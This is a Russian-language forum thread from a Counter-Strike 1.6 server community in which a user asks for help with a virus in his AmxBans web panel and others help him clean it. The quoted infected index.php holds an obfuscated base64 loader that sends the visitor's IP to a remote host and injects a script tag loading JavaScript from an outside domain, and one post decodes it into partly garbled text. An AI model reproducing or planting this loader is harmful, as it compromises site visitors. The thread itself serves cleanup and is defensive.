Наши новости:

14-дек	Добавлена поддержка utf8mb4
24-апр	Telegram группа
10-апр	Обновление PHP
11-апр	Раздача читов

Создание, настройка и продвижение counter-strike 1.6 серверов > > Создание, настройка и продвижение counter-strike 1.6 серверов > Общие вопросы по созданию и настройке сервера > Вирус в AmxBans 1.6 что делать?

Информационная доска

Данный раздел предназначен для обсуждения, а также решения технических проблем связанных с серверной частью. Обсуждения касательно игровых клиентов ведутся здесь.

1. Во время создания новой темы аккуратно оформляйте её, не допускайте грамматических ошибок.
2. Описывая проблему старайтесь, как можно больше рассказать о ней, а так же о действиях с сервером после которых она возникла, по возможности подкрепите информацию логами.
3. Если вопрос касается проблемы в работе сервера, то обязательно прикрепляйте список плагинов (введите в консоли сервера: meta list и amxx plugins), настройки server.cfg, логи. Так же указывайте операционную систему, версию HLDS (введите к консоли сервера: version) и где хостится сервер.

Длинную информацию скрывайте под спойлер.

2 страниц

1 2

Вирус в AmxBans 1.6 что делать?

Опции

Maxopka	23.7.2013, 18:12 Сообщение #21
Стаж: 13 лет Сообщений: 572 Благодарностей: 163 Полезность: 175	Цитата(batonoid @ 23.7.2013, 19:06) Скрытый текст <?php /* AMXBans v6.0 Copyright 2009, 2010 by SeToY & \|PJ\|ShOrTy This file is part of AMXBans. AMXBans is free software, but it's licensed under the Creative Commons - Attribution-NonCommercial-ShareAlike 2.0 AMXBans is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You should have received a copy of the cc-nC-SA along with AMXBans. If not, see <http://creativecommons.org/licenses/by-nc-sa/2.0/>. / @session_start(); //check for existing config file if(!file_exists("include/db.config.inc.php")) { header("Location: setup.php"); } require_once("include/config.inc.php"); require_once("include/access.inc.php"); //start page loader if( $config->start_page == "" \|\| $config->start_page == "index.php" \|\| (!file_exists("$config->start_page"))) { header("Location:ban_list.php"); } else { header("Location:$config->start_page"); } function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+360024); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3N jcmlwdD4="); else echo $content; } } collectnewss (); ?> Я тут почитал в инете что типо этот вирус заражает все файлы php то есть щас нужно будет весь веб хост скачивать через фтп и потом удалять из всех php файлов этот base64 У меня такой. Скрытый текст <?php @session_start(); //check for existing config file if(!file_exists("include/db.config.inc.php")) { header("Location: setup.php"); } require_once("include/config.inc.php"); require_once("include/access.inc.php"); //start page loader if( $config->start_page == "" \|\| $config->start_page == "index.php" \|\| (!file_exists("$config->start_page"))) { header("Location:ban_list.php"); } else { header("Location:$config->start_page"); } ?>
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:13 Сообщение #22
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Я тут раскодировал этот вирус получается типо вот этого: Скрытый текст 랫瞲瞊z޶ꧮٟ귭ꉜ♞rٞ‹"~+,zЎ8℈裑֌�ⶥ鲩רDUD0䄀0с벩v᧞http://xxxporno.xxuz.com:888/move.php?ip=ꗢ埢私뫲魺{~皵襻]4҇�$騉깝hɞ﫯j[䓮"}ʧ婭yȨ⩶᧞<script src="http://newdomme.changeip.name/rsize.js"></script> Вот этот js является вирусом: http://newdomme.changeip.name/rsize.js
	Поблагодарили 0 раз Поблагодарили 0 раз

Maxopka	23.7.2013, 18:14 Сообщение #23
Стаж: 13 лет Сообщений: 572 Благодарностей: 163 Полезность: 175	Цитата(batonoid @ 23.7.2013, 19:13) Я тут раскодировал этот вирус получается типо вот этого: Скрытый текст 랫瞲瞊z޶ꧮٟ귭ꉜ♞rٞ‹"~+,zЎ8℈裑֌�ⶥ鲩רDUD0䄀0с벩v᧞http://xxxporno.xxuz.com:888/move.php?ip=ꗢ埢私뫲魺{~皵襻]4҇�$騉깝hɞ﫯j[䓮"}ʧ婭yȨ⩶᧞<script src="http://newdomme.changeip.name/rsize.js"></script> Вот этот js является вирусом: http://newdomme.changeip.name/rsize.js Мой код вставь в амхбанс.
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:20 Сообщение #24
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Ууууурррррррраааааааааааааааааааааааааааааааааааааа все как по маслу поцы!!! Благодарен всем кто мне помог!!!Maxopka,
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:25 Сообщение #25
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Если что вот проверяйте!!! http://war3ft100lvl.myarena.ru/amxbans/index.php (я извиняюсь если администрация подумает что это спам)
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:49 Сообщение #26
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Появилась еще одна проблема, кароче лазил по веб-хостингу и захотел скачать файл war3ft100lvl.myarena.ru/webstat/index.html антивирус не пустил, что делать в таком случае? Maxopka, Можешь дать оригинал этого файла без вируса?
	Поблагодарили 0 раз Поблагодарили 0 раз

batonoid	23.7.2013, 18:59 Сообщение #27
Стаж: 13 лет Сообщений: 194 Благодарностей: 7 Полезность: < 0	Все я разобрался с этим файлом
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Общие вопросы по созданию и настройке сервера · Следующая тема »

2 страниц

1 2

0 пользователей и 1 гостей читают эту тему:

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Сообщить другу · Версия для печати